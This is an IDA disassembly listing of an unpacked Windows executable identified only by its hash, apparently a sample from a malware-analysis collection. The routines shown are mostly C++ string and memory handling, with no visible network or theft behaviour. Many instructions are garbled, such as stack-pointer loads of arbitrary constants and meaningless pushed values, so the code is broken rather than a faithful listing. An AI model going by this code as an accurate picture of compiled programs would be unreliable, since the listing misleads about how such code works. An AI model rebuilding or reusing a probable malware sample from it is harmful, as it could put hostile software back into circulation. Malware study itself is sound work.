;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : D7E5BBC6139FF438A75955210F913601
; File Name : u:\work\d7e5bbc6139ff438a75955210f913601_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001C000 ( 114688.)
; Section size in file : 0001C000 ( 114688.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_kSjx934 segment para public 'BSS' use32
assume cs:_kSjx934
;org 401000h
assume es:nothing, ss:nothing, ds:_kSjx934, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401141+79�p
; sub_4011D3+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F72
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40101C proc near ; CODE XREF: sub_4012AC+50�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402BA0
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_40101C endp
; =============== S U B R O U T I N E =======================================
sub_401038 proc near ; DATA XREF: .kSjx934:004219C4�o
mov dword ptr [ecx], offset off_41D314
jmp sub_402CCA
sub_401038 endp
; ---------------------------------------------------------------------------
loc_401043: ; DATA XREF: .kSjx934:off_41D314�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D314
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_40105F
push esi
call sub_402F6D
pop ecx
loc_40105F: ; CODE XREF: .kSjx934:00401056�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_401065 proc near ; CODE XREF: sub_40121E+43�p
; sub_4016BA+43�p ...
push 4
mov edi, 0A1D23Bh
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
call sub_402BFB
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_401065 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40109A proc near ; CODE XREF: .kSjx934:004010C8�p
; .kSjx934:004010E7�j ...
push esi
mov esi, ecx
push 0
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_4011D3
mov ecx, esi
pop esi
jmp sub_402CCA
sub_40109A endp
; =============== S U B R O U T I N E =======================================
sub_4010B7 proc near ; DATA XREF: .kSjx934:0041D324�o
; .kSjx934:0041D330�o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_4010C1
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_4010C1: ; CODE XREF: sub_4010B7+4�j
lea eax, [ecx+10h]
retn
sub_4010B7 endp
; ---------------------------------------------------------------------------
loc_4010C5: ; DATA XREF: .kSjx934:off_41D320�o
push esi
mov esi, ecx
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_4010DB
push esi
call sub_402F6D
pop ecx
loc_4010DB: ; CODE XREF: .kSjx934:004010D2�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4010E1: ; DATA XREF: .kSjx934:0042198C�o
mov dword ptr [ecx], offset off_41D32C
jmp sub_40109A
; ---------------------------------------------------------------------------
loc_4010EC: ; DATA XREF: .kSjx934:off_41D32C�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D32C
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_401108
push esi
call sub_402F6D
pop ecx
loc_401108: ; CODE XREF: .kSjx934:004010FF�j
mov eax, esi
pop esi
retn 4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401111 proc near ; CODE XREF: sub_401065+26�p
; sub_4013E6+2B�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_401141
mov eax, esi
pop esi
retn 4
sub_401111 endp
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: .kSjx934:0041C1CE�j
; .kSjx934:0041C24A�j ...
push 0
push 1
call sub_4011D3
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401111+1B�p
; sub_401547+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_401159
call sub_4026B9
loc_401159: ; CODE XREF: sub_401141+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_401169
mov esi, [ebp+arg_8]
loc_401169: ; CODE XREF: sub_401141+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_401187
push 0FFFFFFFFh
add esi, eax
push esi
call sub_4012AC
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_4012AC
jmp short loc_4011CA
; ---------------------------------------------------------------------------
loc_401187: ; CODE XREF: sub_401141+2C�j
push 0
push esi
call sub_401337
test al, al
jz short loc_4011CA
cmp dword ptr [edi+18h], 10h
jb short loc_40119E
mov edi, [edi+4]
jmp short loc_4011A1
; ---------------------------------------------------------------------------
loc_40119E: ; CODE XREF: sub_401141+56�j
add edi, 4
loc_4011A1: ; CODE XREF: sub_401141+5B�j
mov ecx, [ebx+18h]
cmp ecx, 10h
jb short loc_4011AE
mov eax, [ebx+4]
jmp short loc_4011B1
; ---------------------------------------------------------------------------
loc_4011AE: ; CODE XREF: sub_401141+66�j
lea eax, [ebx+4]
loc_4011B1: ; CODE XREF: sub_401141+6B�j
mov edx, [ebp+arg_4]
push esi
add edi, edx
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push esi
mov ecx, ebx
call sub_40131B
loc_4011CA: ; CODE XREF: sub_401141+44�j
; sub_401141+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_401141 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4011D3 proc near ; CODE XREF: sub_40109A+10�p
; .kSjx934:0040113B�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_401208
cmp dword ptr [esi+18h], 10h
jb short loc_401208
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_401200
push [esp+8+arg_4]
push edi
push 10h
push eax
call sub_401000
add esp, 10h
loc_401200: ; CODE XREF: sub_4011D3+1B�j
push edi
call sub_402F6D
pop ecx
pop edi
loc_401208: ; CODE XREF: sub_4011D3+8�j
; sub_4011D3+E�j
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40131B
pop esi
retn 8
sub_4011D3 endp
; =============== S U B R O U T I N E =======================================
sub_40121E proc near ; CODE XREF: sub_41BB84+4A�p
push 44h
mov edi, 0EB1D23h
call sub_4045CC
push dword ptr [ebp+10h]
mov esi, [ebp+0Ch]
push dword ptr [esi+4]
push esi
call sub_401395
mov esp, 8EB1D2h
sub ecx, ds:dword_433C44
cmp ecx, 1
jnb short loc_40127B
push 4758E9h
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 23AC74h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
loc_40127B: ; CODE XREF: sub_40121E+29�j
inc ds:dword_433C44
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_40121E endp
; =============== S U B R O U T I N E =======================================
sub_401291 proc near ; CODE XREF: .kSjx934:loc_41C370�p
push 11D63Ah
call sub_40304B
test eax, eax
pop ecx
jz short loc_4012A2
mov [eax], eax
loc_4012A2: ; CODE XREF: sub_401291+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4012AB
mov [ecx], eax
locret_4012AB: ; CODE XREF: sub_401291+16�j
retn
sub_401291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012AC proc near ; CODE XREF: sub_401141+33�p
; sub_401141+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_4012C0
call sub_4026B9
loc_4012C0: ; CODE XREF: sub_4012AC+D�j
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_4012CD
mov [ebp+arg_4], eax
loc_4012CD: ; CODE XREF: sub_4012AC+1C�j
cmp [ebp+arg_4], 0
jbe short loc_401313
mov ecx, [esi+18h]
cmp ecx, 10h
push ebx
lea edx, [esi+4]
jb short loc_4012E3
mov ebx, [edx]
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012E3: ; CODE XREF: sub_4012AC+31�j
mov ebx, edx
loc_4012E5: ; CODE XREF: sub_4012AC+35�j
cmp ecx, 10h
jb short loc_4012EC
mov edx, [edx]
loc_4012EC: ; CODE XREF: sub_4012AC+3C�j
sub eax, [ebp+arg_4]
add ebx, edi
add ebx, [ebp+arg_4]
push eax
push ebx
sub ecx, edi
push ecx
add edx, edi
push edx
call sub_40101C
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 10h
push eax
mov ecx, esi
call sub_40131B
pop ebx
loc_401313: ; CODE XREF: sub_4012AC+25�j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_4012AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40131B proc near ; CODE XREF: sub_401111+C�p
; sub_401141+84�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40132D
mov ecx, [ecx+4]
jmp short loc_401330
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_40131B+B�j
add ecx, 4
loc_401330: ; CODE XREF: sub_40131B+10�j
mov byte ptr [ecx+eax], 0
retn 4
sub_40131B endp
; =============== S U B R O U T I N E =======================================
sub_401337 proc near ; CODE XREF: sub_401141+49�p
; sub_401547+39�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_401349
call sub_40267A
loc_401349: ; CODE XREF: sub_401337+B�j
cmp [esi+18h], edi
jnb short loc_40135B
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_401442
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401337+15�j
cmp [esp+8+arg_4], 0
jz short loc_40137C
cmp edi, 10h
jnb short loc_40137C
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_401370
mov eax, edi
loc_401370: ; CODE XREF: sub_401337+35�j
push eax
push 1
mov ecx, esi
call sub_4011D3
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40137C: ; CODE XREF: sub_401337+29�j
; sub_401337+2E�j
test edi, edi
jnz short loc_401388
push edi
mov ecx, esi
call sub_40131B
loc_401388: ; CODE XREF: sub_401337+22�j
; sub_401337+43�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_401337 endp
; =============== S U B R O U T I N E =======================================
sub_401395 proc near ; CODE XREF: sub_40121E+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 48EB1Dh
call sub_40304B
test eax, eax
pop ecx
jz short loc_4013AA
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_4013AA: ; CODE XREF: sub_401395+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_4013B7
mov edx, [esp+arg_4]
mov [ecx], edx
loc_4013B7: ; CODE XREF: sub_401395+1A�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_4013CA
push esi
mov esi, [esp+8+arg_8]
push 41h
pop ecx
rep movsd
pop esi
loc_4013CA: ; CODE XREF: sub_401395+28�j
pop edi
retn 0Ch
sub_401395 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D32C
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4013E6 proc near ; CODE XREF: .kSjx934:004013D5�p
; sub_4026B9+46�p
push 4
mov ecx, 0C24758h
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call sub_402C72
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_4013E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401420 proc near ; CODE XREF: sub_40121E+33�p
; sub_4016BA+33�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push [esp+4+arg_0]
mov ecx, esi
call sub_401524
mov eax, esi
pop esi
retn 4
sub_401420 endp
; =============== S U B R O U T I N E =======================================
sub_401442 proc near ; CODE XREF: sub_401337+1D�p
push 0Ch
mov edx, 8B091Dh
call sub_4045FF
mov edi, ecx
mov [ebp-18h], edi
mov esi, [ebp+8]
or esi, 0Fh
cmp esi, 0FFFFFFFEh
jbe short loc_401463
mov esi, [ebp+8]
jmp short loc_401488
; ---------------------------------------------------------------------------
loc_401463: ; CODE XREF: sub_401442+1A�j
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_401488
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_401488
lea esi, [edx+ecx]
loc_401488: ; CODE XREF: sub_401442+1F�j
; sub_401442+38�j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push 0
push eax
call sub_4015ED
pop ecx
pop ecx
mov ebx, eax
jmp short loc_4014C7
; ---------------------------------------------------------------------------
loc_40149D: ; DATA XREF: .kSjx934:00421A8C�o
mov eax, [ebp+8]
mov [ebp-10h], esp
mov [ebp+8], eax
inc eax
push 0
push eax
mov byte ptr [ebp-4], 2
call sub_4015ED
pop ecx
mov [ebp-14h], eax
pop ecx
mov ecx, 0C45848h
retn
; ---------------------------------------------------------------------------
mov edi, [ebp-18h]
mov esi, [ebp+8]
mov ebx, [ebp-14h]
loc_4014C7: ; CODE XREF: sub_401442+59�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_4014EC
cmp dword ptr [edi+18h], 10h
jb short loc_4014D8
mov eax, [edi+4]
jmp short loc_4014DB
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_401442+8F�j
lea eax, [edi+4]
loc_4014DB: ; CODE XREF: sub_401442+94�j
push dword ptr [ebp+0Ch]
push eax
lea eax, [esi+1]
push eax
push ebx
call sub_401000
add esp, 10h
loc_4014EC: ; CODE XREF: sub_401442+89�j
push 0
push 1
mov ecx, edi
call sub_4011D3
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_40131B
call sub_40466B
retn 8
sub_401442 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40150F proc near ; DATA XREF: .kSjx934:00421A7C�o
mov ecx, [ebp-18h]
xor esi, esi
push esi
push 1
call sub_4011D3
push esi
push esi
call sub_4041BB
int 3 ; Trap to Debugger
sub_40150F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401524 proc near ; CODE XREF: sub_401420+17�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
lea edx, [eax+1]
loc_40152E: ; CODE XREF: sub_401524+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40152E
sub eax, edx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_401547
pop esi
retn 4
sub_401524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401547 proc near ; CODE XREF: sub_401524+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_4015B9
test al, al
jz short loc_401579
cmp dword ptr [esi+18h], 10h
jb short loc_401566
mov eax, [esi+4]
jmp short loc_401569
; ---------------------------------------------------------------------------
loc_401566: ; CODE XREF: sub_401547+18�j
lea eax, [esi+4]
loc_401569: ; CODE XREF: sub_401547+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_401141
jmp short loc_4015B3
; ---------------------------------------------------------------------------
loc_401579: ; CODE XREF: sub_401547+12�j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_401337
test al, al
jz short loc_4015B1
mov ecx, [esi+18h]
cmp ecx, 10h
jb short loc_401596
mov eax, [esi+4]
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401596: ; CODE XREF: sub_401547+48�j
lea eax, [esi+4]
loc_401599: ; CODE XREF: sub_401547+4D�j
push [ebp+arg_4]
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push [ebp+arg_4]
mov ecx, esi
call sub_40131B
loc_4015B1: ; CODE XREF: sub_401547+40�j
mov eax, esi
loc_4015B3: ; CODE XREF: sub_401547+30�j
pop edi
pop esi
pop ebp
retn 8
sub_401547 endp
; =============== S U B R O U T I N E =======================================
sub_4015B9 proc near ; CODE XREF: sub_401547+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_4015C9
mov edx, [eax]
jmp short loc_4015CB
; ---------------------------------------------------------------------------
loc_4015C9: ; CODE XREF: sub_4015B9+A�j
mov edx, eax
loc_4015CB: ; CODE XREF: sub_4015B9+E�j
cmp [esp+4+arg_0], edx
jb short loc_4015E7
cmp esi, 10h
jb short loc_4015D8
mov eax, [eax]
loc_4015D8: ; CODE XREF: sub_4015B9+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_4015E7
mov al, 1
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015E7: ; CODE XREF: sub_4015B9+16�j
; sub_4015B9+28�j
xor al, al
loc_4015E9: ; CODE XREF: sub_4015B9+2C�j
pop esi
retn 4
sub_4015B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015ED proc near ; CODE XREF: sub_401442+50�p
; sub_401442+6C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
sub esp, 0Ch
test ecx, ecx
ja short loc_401605
xor ecx, ecx
loc_4015FC: ; CODE XREF: sub_4015ED+22�j
push ecx
call sub_40304B
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_401605: ; CODE XREF: sub_4015ED+B�j
or eax, 0FFFFFFFFh
xor edx, edx
div ecx
cmp eax, 1
jnb short loc_4015FC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
call sub_402C0C
push 6A2C24h
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push [esp+10h+var_8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn 4
sub_4015ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40164F proc near ; CODE XREF: sub_40243A+47�p
; sub_40243A:loc_4024A3�p ...
cmp dword ptr [esi], 0
jnz short loc_401659
call sub_402F5D
loc_401659: ; CODE XREF: sub_40164F+3�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401668
call sub_402F5D
loc_401668: ; CODE XREF: sub_40164F+12�j
mov eax, [esi+4]
add eax, 8
retn
sub_40164F endp
; =============== S U B R O U T I N E =======================================
sub_40166F proc near ; CODE XREF: sub_40243A+39�p
; sub_413F8F+2F�p ...
mov eax, [esi]
test eax, eax
jz short loc_401679
cmp eax, [edi]
jz short loc_40167E
loc_401679: ; CODE XREF: sub_40166F+4�j
call sub_402F5D
loc_40167E: ; CODE XREF: sub_40166F+8�j
mov eax, [esi+4]
xor ecx, ecx
cmp eax, [edi+4]
setnz cl
mov al, cl
retn
sub_40166F endp
; =============== S U B R O U T I N E =======================================
sub_40168C proc near ; CODE XREF: sub_40243A+62�p
; sub_413F8F+47�p ...
cmp dword ptr [esi], 0
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
jnz short loc_4016A0
call sub_402F5D
loc_4016A0: ; CODE XREF: sub_40168C+D�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_4016AF
call sub_402F5D
loc_4016AF: ; CODE XREF: sub_40168C+1C�j
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, edi
retn
sub_40168C endp
; =============== S U B R O U T I N E =======================================
sub_4016BA proc near ; CODE XREF: sub_4140AB+54�p
push 48h
mov edx, 0CF5161h
call sub_4045CC
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_401745
mov ecx, 3C3C3C3h
sub ecx, ds:dword_433C50
cmp ecx, 1
jnb short loc_401717
push 67A8B0h
lea ecx, [ebp-2Ch]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_401065
push 33D458h
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_41D32C
call sub_4041BB
loc_401717: ; CODE XREF: sub_4016BA+29�j
inc ds:dword_433C50
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_4016BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40172D proc near ; CODE XREF: .kSjx934:loc_41C38D�p
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_40173B
mov [eax], eax
loc_40173B: ; CODE XREF: sub_40172D+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401744
mov [ecx], eax
locret_401744: ; CODE XREF: sub_40172D+13�j
retn
sub_40172D endp
; =============== S U B R O U T I N E =======================================
sub_401745 proc near ; CODE XREF: sub_4016BA+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_401757
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_401757: ; CODE XREF: sub_401745+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401764
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401764: ; CODE XREF: sub_401745+17�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_401777
push esi
mov esi, [esp+8+arg_8]
push 11h
pop ecx
rep movsd
pop esi
loc_401777: ; CODE XREF: sub_401745+25�j
pop edi
retn 0Ch
sub_401745 endp
; =============== S U B R O U T I N E =======================================
sub_40177B proc near ; DATA XREF: .kSjx934:off_420AE4�o
push 59EA2Ch
mov edx, 6ACF51h
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4BCh], eax
mov [ebp-4C0h], edi
jl loc_4019D5
mov ebp, 0ECF59Eh
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 767ACFh
lea esi, [ebp-0D0h]
mov esi, 2FD9EBh
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401817
cmp ds:byte_425222, 0
jz loc_4019EB
loc_401817: ; CODE XREF: sub_40177B+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401823: ; CODE XREF: sub_40177B+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401841
test dl, dl
jz short loc_40183D
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401841
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401823
loc_40183D: ; CODE XREF: sub_40177B+B0�j
xor eax, eax
jmp short loc_401846
; ---------------------------------------------------------------------------
loc_401841: ; CODE XREF: sub_40177B+AC�j
; sub_40177B+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401846: ; CODE XREF: sub_40177B+C4�j
test eax, eax
jnz loc_4019C8
push 1FECF5h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4BCh]
mov edi, 0C4FF67h
push esi
mov ebx, 4B13FDh
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_40188A: ; CODE XREF: sub_40177B+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40188A
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_4018BB: ; CODE XREF: sub_40177B+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018BB
mov ebx, [ebp-4C0h]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_4018EE: ; CODE XREF: sub_40177B+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018EE
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea esi, [eax+1]
loc_40191B: ; CODE XREF: sub_40177B+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40191B
sub eax, esi
mov [ebp+eax-295h], cl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 4
mov [ebp-193h], al
pop eax
cmp [ebp+1Ch], eax
jl short loc_40198B
mov [ebp-4BCh], eax
loc_40194B: ; CODE XREF: sub_40177B+203�j
mov eax, [ebx+eax*4]
push 3
mov edi, 0E2D89Fh
mov esi, eax
pop ecx
xor edx, edx
repe cmpsb
jz short loc_401982
mov esi, eax
push 2
mov esp, 0C38B62h
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401982
mov eax, [ebp-4BCh]
inc eax
cmp eax, [ebp+1Ch]
mov [ebp-4BCh], eax
jle short loc_40194B
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_40177B+1E1�j
; sub_40177B+1F1�j
mov byte ptr [ebp-195h], 1
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_40177B+1C8�j
mov byte ptr [ebp-195h], 0
loc_401992: ; CODE XREF: sub_40177B+205�j
; sub_40177B+20E�j
push 8
mov byte ptr [ebp-194h], 0
call sub_40304B
pop ecx
mov [ebp-4C0h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4019EB
push 69C5B1h
lea ecx, [ebp-4B8h]
mov esi, 84D38Bh
mov esi, eax
call sub_4140AB
jmp short loc_4019EB
; ---------------------------------------------------------------------------
loc_4019C8: ; CODE XREF: sub_40177B+CD�j
push 4A69C5h
push dword ptr [ebp-4BCh]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40177B+2E�j
push 2534E2h
push eax
loc_4019DB: ; CODE XREF: sub_40177B+258�j
push dword ptr [ebp+0Ch]
push 529A71h
call sub_417361
add esp, 10h
loc_4019EB: ; CODE XREF: sub_40177B+96�j
